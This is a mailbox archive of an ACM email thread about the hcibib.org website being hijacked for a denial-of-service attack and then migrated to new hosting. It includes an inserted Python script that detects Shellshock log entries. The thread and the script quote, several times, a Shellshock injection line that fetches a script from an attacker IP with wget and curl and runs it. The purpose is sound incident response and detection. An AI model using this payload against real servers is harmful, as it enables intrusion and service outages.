>> I'm a little embarrassed on this, but a move to a new hosting env has been
>> "in the works" since at least last September, when I was given an account (
>> perlman.hosting.acm.org). At the time, I was overwhelmed by the task,
>> but I think I can make progress.
>>
>> I will work on the file transfers today.
>>
>> Gary
>>
>> On Sat, 9 May 2015, Adam Greenberg wrote:
>>
>>  Ok.  What I would like to do then, is move you off of this old turing
>>> server and over to our newer hosting environment.
>>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get
>>> Gary Perlman setup on the new server, and all the files from the
>>> hcibib.org website synced over to the new server.
>>> Once Gary checks to make sure it works correctly we can cut DNS over.
>>> There are more filters and controls in place on the new environment,
>>> that would help mitigate the issue should it happen again.
>>> On the current server, this issue shut down this whole box, along with
>>> ACM's main website, because it tied up the resources of this server.
>>>
>>> Ishelpdesk, please proceed with getting an account setup for Gary, and
>>> setting it up to support the hcibib.org website.
>>>
>>> Thanks
>>> Adam
>>>
>>> -----Original Message-----
>>> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
>>> Sent: Friday, May 08, 2015 6:50 PM
>>> To: Adam Greenberg
>>> Cc: Ken Bauer; ishelpdesk
>>> Subject: Re: hcibib.org website problem
>>>
>>> Well, I am stumped. I don't know what script was used for the attack,
>>> and if I did, I am not sure how I would prevent further attacks.
>>>
>>> Gary Perlman, Director, HCI Bibliography Project mailto:
>>> director@hcibib.org  http://hcibib.org/
>>>
>>> On Wed, 6 May 2015, Adam Greenberg wrote:
>>>
>>>  Hello Gary,
>>>> I had to take the hcibib.org website offline tonight.   The site was
>>>> used to execute a denial of service attack that took down the server.
>>>> Here is the reference from the hcibib.org weblogs
>>>>
>>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200
>>>> 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget
>>>> http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl
>>>> http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh
>>>> /tmp/dd1.sh 0>&1'"
>>>>
>>>> I put the entire weblog for today to your /home/Perlman
>>>>
>>>> The request executed a denial of service attack that started this.
>>>> apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf
>>>> /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O
>>>> /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh
>>>> /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>>>>
>>>> Attached is a sample of what was running on the server.
>>>>
>>>> I have changed the default document root of the website until I hear
>>>> from you.  I would prefer to bring the site back online restricted to the
>>>> IP address that you will be connecting from so that you have time to
>>>> properly examine your site and then we can open it back up.  Please let me
>>>> know the IP address you will be connecting from and I will make the
>>>> appropriate configuration changes.
>>>>
>>>> Thanks
>>>> Adam
>>>>
>>>>
>>>> Adam Greenberg
>>>> Senior Systems Analyst
>>>> Association for Computing Machinery
>>>> 2 Penn Plaza
>>>> Suite 701
>>>> New York, NY 10121
>>>> Office: 212-626-0573
>>>> greenberg@acm.org
>>>>
>>>>
>>>>
>>>
>>>
>>
>>
> --
>



-- 
Ken Bauer <kenbauer@gmail.com> (all other aliases end up in the same inbox)
Blog: http://blog.kenbauer.me
Academic Page: http://personal.gda.itesm.mx/kenbauer/
Social media contacts available through both sites if you want to follow me
there.

--001a113994542968a30515a6c3a6--

From greenberg@hq.acm.org  Sat May  9 10:16:26 2015
Return-Path: <greenberg@hq.acm.org>
Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1bon0078.outbound.protection.outlook.com [157.56.111.78])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49EGPZB009978
	for <perlman@turing.acm.org>; Sat, 9 May 2015 10:16:25 -0400
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by
 CY1PR0501MB1834.namprd05.prod.outlook.com (25.163.141.148) with Microsoft
 SMTP Server (TLS) id 15.1.154.19; Sat, 9 May 2015 14:16:30 +0000
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by
 CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id
 15.01.0160.009; Sat, 9 May 2015 14:16:30 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: Gary PERLMAN <perlman@turing.acm.org>
CC: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem
Thread-Topic: hcibib.org website problem
Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyAAAA8H4AAACiKJw==
Date: Sat, 9 May 2015 14:16:29 +0000
Message-ID: <fexjkcj323dk2uk46n8iabre.1431180981595@email.android.com>
References: <BN3PR0501MB123593A3CC77235DDD7190659FD00@BN3PR0501MB1235.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505081848190.27144@turing.acm.org>
 <CY1PR0501MB1241687AF2DB723952BDC7B09FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505090950260.4925@turing.acm.org>
 <CY1PR0501MB1241210170DEA120D155A6EF9FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>,<Pine.LNX.4.64.1505091010360.8767@turing.acm.org>
In-Reply-To: <Pine.LNX.4.64.1505091010360.8767@turing.acm.org>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
authentication-results: turing.acm.org; dkim=none (message not signed)
 header.d=none;
x-originating-ip: [98.15.179.72]
x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1834;
x-microsoft-antispam-prvs: <CY1PR0501MB1834836331439A45BA10EB7A9FDD0@CY1PR0501MB1834.namprd05.prod.outlook.com>
x-exchange-antispam-report-test: UriScan:;
x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1834;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1834;
x-forefront-prvs: 05715BE7FD
x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6019001)(269900001)(24454002)(43234003)(479174004)(51704005)(377454003)(110136002)(77156002)(2656002)(40100003)(62966003)(46102003)(122556002)(5001960100002)(99286002)(63666004)(189998001)(19580405001)(19617315012)(19625215002)(33646002)(15395725005)(16236675004)(87936001)(19580395003)(66066001)(76176999)(102836002)(95246002)(15975445007)(50986999)(54356999)(5890100001)(2900100001)(86362001)(2950100001)(92566002)(256605007);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1834;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en;
Content-Type: multipart/alternative;
	boundary="_000_fexjkcj323dk2uk46n8iabre1431180981595emailandroidcom_"
MIME-Version: 1.0
X-OriginatorOrg: hq.acm.org
X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 14:16:29.1494
 (UTC)
X-MS-Exchange-CrossTenant-fromentityheader: Hosted
X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6
X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1834
Status: R
X-Status: A
X-Keywords:                 

--_000_fexjkcj323dk2uk46n8iabre1431180981595emailandroidcom_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Filezilla to Turing is either sftp or ftp server turing.acm.org  ports are =
standard 22 for sftp and 21 for ftp



Thanks
Adam


-------- Original message --------
From: Gary PERLMAN <perlman@turing.acm.org>
Date: 05/09/2015 10:12 AM (GMT-05:00)
To: Adam Greenberg <greenberg@hq.acm.org>
Cc: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem

File transfer via SSH keeps failing. Do you know what parameters I need to =
connect to turing with FileZilla?

Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

> Ok. Great.
> Let us know if you need any assistance.
>
> Thanks
> Adam
>
> -----Original Message-----
> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
> Sent: Saturday, May 09, 2015 9:59 AM
> To: Adam Greenberg
> Cc: Ken Bauer; ishelpdesk
> Subject: RE: hcibib.org website problem
>
> I am very sorry to have been unwittingly involved in shutting down acm.or=
g!
>
> I'm a little embarrassed on this, but a move to a new hosting env has been=
 "in the works" since at least last September, when I was given an account =
(perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but =
I think I can make progress.
>
> I will work on the file transfers today.
>
> Gary
>
> On Sat, 9 May 2015, Adam Greenberg wrote:
>
>> Ok.  What I would like to do then, is move you off of this old turing se=
rver and over to our newer hosting environment.
>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get =
Gary Perlman setup on the new server, and all the files from the hcibib.org=
 website synced over to the new server.
>> Once Gary checks to make sure it works correctly we can cut DNS over.
>> There are more filters and controls in place on the new environment, tha=
t would help mitigate the issue should it happen again.
>> On the current server, this issue shut down this whole box, along with A=
CM's main website, because it tied up the resources of this server.
>>
>> Ishelpdesk, please proceed with getting an account setup for Gary, and s=
etting it up to support the hcibib.org website.
>>
>> Thanks
>> Adam
>>
>> -----Original Message-----
>> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
>> Sent: Friday, May 08, 2015 6:50 PM
>> To: Adam Greenberg
>> Cc: Ken Bauer; ishelpdesk
>> Subject: Re: hcibib.org website problem
>>
>> Well, I am stumped. I don't know what script was used for the attack, an=
d if I did, I am not sure how I would prevent further attacks.
>>
>> Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.=
org  http://hcibib.org/
>>
>> On Wed, 6 May 2015, Adam Greenberg wrote:
>>
>>> Hello Gary,
>>> I had to take the hcibib.org website offline tonight.   The site was us=
ed to execute a denial of service attack that took down the server.
>>> Here is the reference from the hcibib.org weblogs
>>>
>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 107=
40 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://=
62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/d=
d1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
>>>
>>> I put the entire weblog for today to your /home/Perlman
>>>
>>> The request executed a denial of service attack that started this.
>>> apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tm=
p/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http=
://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>>>
>>> Attached is a sample of what was running on the server.
>>>
>>> I have changed the default document root of the website until I hear fr=
om you.  I would prefer to bring the site back online restricted to the IP =
address that you will be connecting from so that you have time to properly =
examine your site and then we can open it back up.  Please let me know the I=
P address you will be connecting from and I will make the appropriate confi=
guration changes.
>>>
>>> Thanks
>>> Adam
>>>
>>>
>>> Adam Greenberg
>>> Senior Systems Analyst
>>> Association for Computing Machinery
>>> 2 Penn Plaza
>>> Suite 701
>>> New York, NY 10121
>>> Office: 212-626-0573
>>> greenberg@acm.org
>>>
>>>
>>
>>
>
>

--

--_000_fexjkcj323dk2uk46n8iabre1431180981595emailandroidcom_--

From greenberg@hq.acm.org  Mon May 11 16:17:53 2015
Return-Path: <greenberg@hq.acm.org>
Received: from na01-by2-obe.outbound.protection.outlook.com (mail-by2on0085.outbound.protection.outlook.com [207.46.100.85])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t4BKHqWX001581
	for <perlman@turing.acm.org>; Mon, 11 May 2015 16:17:52 -0400
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by
 CY1PR0501MB1835.namprd05.prod.outlook.com (25.163.141.149) with Microsoft
 SMTP Server (TLS) id 15.1.154.19; Mon, 11 May 2015 20:17:56 +0000
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by
 CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id
 15.01.0160.009; Mon, 11 May 2015 20:17:57 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: Gary PERLMAN <perlman@turing.acm.org>
CC: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem
Date: Mon, 11 May 2015 20:17:55 +0000

Gary,
I fixed the hosting for you.  If you look in cpanel under "Add On Domains"
I added hcibib.org and mapped it with a document root of  /public_html/hcibib/

If you add this entry to your local hosts file
216.119.136.18 hcibib.org 
You can hit the site as hcibib.org without us modifying any DNS entries and opening it up right now.

http://hcibib.org/index.html

Once you think it's ready to go, let me know and I can change the DNS entries.

We can leave the files in place on turing for now, that's not a problem.

Thanks
Adam

-----Original Message-----
From: Gary PERLMAN [mailto:perlman@turing.acm.org] 
Sent: Monday, May 11, 2015 3:57 PM
To: Adam Greenberg
Cc: Ken Bauer; ishelpdesk
Subject: RE: hcibib.org website problem

I'm getting close. I've transferred a lot of files over to perlman.hosting.acm.org and have made good progress getting things working. I'd like to go live for just my IP:
 	24.48.90.117
and I'd like hcibib.org to point to:
 	/home/perlman/www/hcibib
I disabled some scripts I suspect of being vulnerable to a backdoor attack, and I'm going to rework any before I activate them again.

I'd like a few days of testing before opening up hcibib.org from its new home.
I'd prefer that my old files on turing stick around for a while while I make sure that I've gotten everything.

Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

> Filezilla to Turing is either sftp or ftp server turing.acm.org  ports 
> are standard 22 for sftp and 21 for ftp
>
>
>
> Thanks
> Adam
>
>
> -------- Original message --------
> From: Gary PERLMAN <perlman@turing.acm.org>
> Date: 05/09/2015 10:12 AM (GMT-05:00)
> To: Adam Greenberg <greenberg@hq.acm.org>
> Cc: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
> Subject: RE: hcibib.org website problem
>
> File transfer via SSH keeps failing. Do you know what parameters I need to connect to turing with FileZilla?
>
> Gary
>
> On Sat, 9 May 2015, Adam Greenberg wrote:
>
>> Ok. Great.
>> Let us know if you need any assistance.
>>
>> Thanks
>> Adam
>>
>> -----Original Message-----
>> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
>> Sent: Saturday, May 09, 2015 9:59 AM
>> To: Adam Greenberg
>> Cc: Ken Bauer; ishelpdesk
>> Subject: RE: hcibib.org website problem
>>
>> I am very sorry to have been unwittingly involved in shutting down acm.org!
>>
>> I'm a little embarrassed on this, but a move to a new hosting env has been "in the works" since at least last September, when I was given an account (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but I think I can make progress.
>>
>> I will work on the file transfers today.
>>
>> Gary
>>
>> On Sat, 9 May 2015, Adam Greenberg wrote:
>>
>>> Ok.  What I would like to do then, is move you off of this old turing server and over to our newer hosting environment.
>>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server.
>>> Once Gary checks to make sure it works correctly we can cut DNS over.
>>> There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again.
>>> On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server.
>>>
>>> Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website.
>>>
>>> Thanks
>>> Adam
>>>
>>> -----Original Message-----
>>> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
>>> Sent: Friday, May 08, 2015 6:50 PM
>>> To: Adam Greenberg
>>> Cc: Ken Bauer; ishelpdesk
>>> Subject: Re: hcibib.org website problem
>>>
>>> Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks.
>>>
>>> Gary Perlman, Director, HCI Bibliography Project 
>>> mailto:director@hcibib.org  http://hcibib.org/
>>>
>>> On Wed, 6 May 2015, Adam Greenberg wrote:
>>>
>>>> Hello Gary,
>>>> I had to take the hcibib.org website offline tonight.   The site was used to execute a denial of service attack that took down the server.
>>>> Here is the reference from the hcibib.org weblogs
>>>>
>>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
>>>>
>>>> I put the entire weblog for today to your /home/Perlman
>>>>
>>>> The request executed a denial of service attack that started this.
>>>> apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>>>>
>>>> Attached is a sample of what was running on the server.
>>>>
>>>> I have changed the default document root of the website until I hear from you.  I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine your site and then we can open it back up.  Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes.
>>>>
>>>> Thanks
>>>> Adam
>>>>
>>>>
>>>> Adam Greenberg
>>>> Senior Systems Analyst
>>>> Association for Computing Machinery
>>>> 2 Penn Plaza
>>>> Suite 701
>>>> New York, NY 10121
>>>> Office: 212-626-0573
>>>> greenberg@acm.org
>>>>
>>>>
>>>
>>>
>>
>>
>
> --
>

-- 
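
The access-log entry and the process row quoted in the thread above can be matched mechanically. The Python below is an added example, not part of the original correspondence: it flags combined-format log entries whose Referer or User-Agent starts with a bash function definition (`() {`, the pattern known as Shellshock), pulls the URLs out of the trailing command, and looks for web-server-owned processes whose command line references them. The function names, the `apache` user default and the benign sample rows are assumptions made for the example; the flagged log entry and the bash process row are the ones quoted in the thread.

```python
import re

# Apache "combined" log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$'
)
# An unpatched bash treats an environment value that starts with "() {" as a
# function definition; CGI hands request headers to scripts as environment
# variables, which is how a header value reaches bash at all.
FUNC_DEF = re.compile(r'^\s*\(\s*\)\s*\{')
URL = re.compile(r'https?://[^\s;\'"|&]+')


def scan_access_log(lines):
    """Return one finding per logged header value that starts with a function definition."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not combined format
        for field in ("referer", "agent"):
            value = m.group(field)
            if not FUNC_DEF.match(value):
                continue
            # Text after the function body's closing "};" is the command an
            # unpatched bash would run while importing the variable.
            _, sep, tail = value.partition("};")
            trailing = tail.strip() if sep else value.strip()
            urls = list(dict.fromkeys(URL.findall(trailing)))  # de-duplicate, keep order
            findings.append({
                "lineno": lineno, "host": m.group("host"), "time": m.group("time"),
                "status": int(m.group("status")), "field": field,
                "trailing": trailing, "urls": urls,
            })
    return findings


def correlate_processes(findings, ps_lines, web_user="apache"):
    """Match `ps -ef` rows owned by the web server user against URLs seen in findings."""
    urls = {u for f in findings for u in f["urls"]}
    hits = []
    for row in ps_lines:
        parts = row.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(parts) < 8 or not (parts[1].isdigit() and parts[2].isdigit()):
            continue  # header or malformed row
        uid, pid, ppid, cmd = parts[0], int(parts[1]), int(parts[2]), parts[7]
        if uid == web_user and any(u in cmd for u in urls):
            # PPID 1: the parent exited and init adopted the process, so it is
            # no longer a child of the web server that spawned it.
            hits.append({"pid": pid, "ppid": ppid, "orphaned": ppid == 1, "cmd": cmd})
    return hits


# Line 2 is the entry quoted in the thread; lines 1 and 3 are constructed benign traffic.
ACCESS_LOG = r"""
192.0.2.10 - - [06/May/2015:12:11:02 -0400] "GET /index.html HTTP/1.1" 200 10740 "-" "Mozilla/5.0 (X11; Linux x86_64)"
62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
198.51.100.7 - - [06/May/2015:12:13:15 -0400] "GET /search HTTP/1.1" 200 512 "http://hcibib.org/" "Mozilla/5.0 (Windows NT 6.1)"
""".strip().splitlines()

# The bash row is the one quoted in the thread; the header and httpd rows are constructed.
PS_OUTPUT = r"""
UID        PID  PPID  C STIME TTY          TIME CMD
apache   28001 27990  0 12:10 ?        00:00:01 /usr/sbin/httpd
apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
""".strip().splitlines()

if __name__ == "__main__":
    found = scan_access_log(ACCESS_LOG)
    for f in found:
        print(f"log line {f['lineno']}: {f['host']} {f['field']} status={f['status']} urls={f['urls']}")
    for p in correlate_processes(found, PS_OUTPUT):
        print(f"pid {p['pid']} ppid {p['ppid']} orphaned={p['orphaned']}")
```

The 200 status on the flagged entry only records that the page was served; it is the matching process row that shows the injected command actually ran.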

From greenberg@hq.acm.org  Wed May 13 10:15:47 2015
Return-Path: <greenberg@hq.acm.org>
Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1bon0071.outbound.protection.outlook.com [157.56.111.71])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t4DEFkme010632
	for <perlman@turing.acm.org>; Wed, 13 May 2015 10:15:47 -0400
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by
 CY1PR0501MB1836.namprd05.prod.outlook.com (25.163.141.15) with Microsoft SMTP
 Server (TLS) id 15.1.154.19; Wed, 13 May 2015 14:15:51 +0000
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by
 CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id
 15.01.0160.009; Wed, 13 May 2015 14:15:51 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: Gary PERLMAN <perlman@turing.acm.org>
CC: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem
Date: Wed, 13 May 2015 14:15:50 +0000

Gary,
I made the DNS changes for the website.

One question, what would you like to do about the email?

Do you have a gmail address you would like us to point the domain to?  And the mail for the @acm.org address that you have going to perlman@turing.acm.org?
You can use the email functionality within the Perlman.hosting.acm.org account.  It's configurable in cpanel.

Let me know.

Thanks
Adam


-----Original Message-----
From: Gary PERLMAN [mailto:perlman@turing.acm.org] 
Sent: Wednesday, May 13, 2015 9:32 AM
To: Adam Greenberg
Cc: Ken Bauer; ishelpdesk
Subject: RE: hcibib.org website problem

I'm ready to go live. I still have some things to fix, but the core functionality is working.

Gary


-- 

From greenberg@hq.acm.org  Wed May 13 10:43:33 2015
Return-Path: <greenberg@hq.acm.org>
Received: from na01-by2-obe.outbound.protection.outlook.com (mail-by2on0095.outbound.protection.outlook.com [207.46.100.95])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t4DEhWUN015664
	for <perlman@turing.acm.org>; Wed, 13 May 2015 10:43:33 -0400
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by
 CY1PR0501MB1835.namprd05.prod.outlook.com (25.163.141.149) with Microsoft
 SMTP Server (TLS) id 15.1.154.19; Wed, 13 May 2015 14:43:36 +0000
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by
 CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id
 15.01.0160.009; Wed, 13 May 2015 14:43:37 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: Gary PERLMAN <perlman@turing.acm.org>
CC: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem
Date: Wed, 13 May 2015 14:43:36 +0000

Ok. Let me know what you decide to do with hcibib.org
If any DNS changes need to be done for the MX record of hcibib.org I can take care of that.

Thanks
Adam

-----Original Message-----
From: Gary PERLMAN [mailto:perlman@turing.acm.org] 
Sent: Wednesday, May 13, 2015 10:31 AM
To: Adam Greenberg
Cc: Ken Bauer; ishelpdesk
Subject: RE: hcibib.org website problem

Thanks, Adam,

I too have the same question about the email, but I don't have an answer.

I'm quite familiar with the email options in cpanel. I think I can handle the mail forwarding for hcibib.org and will update my @acm.org address.

Gary


-- 

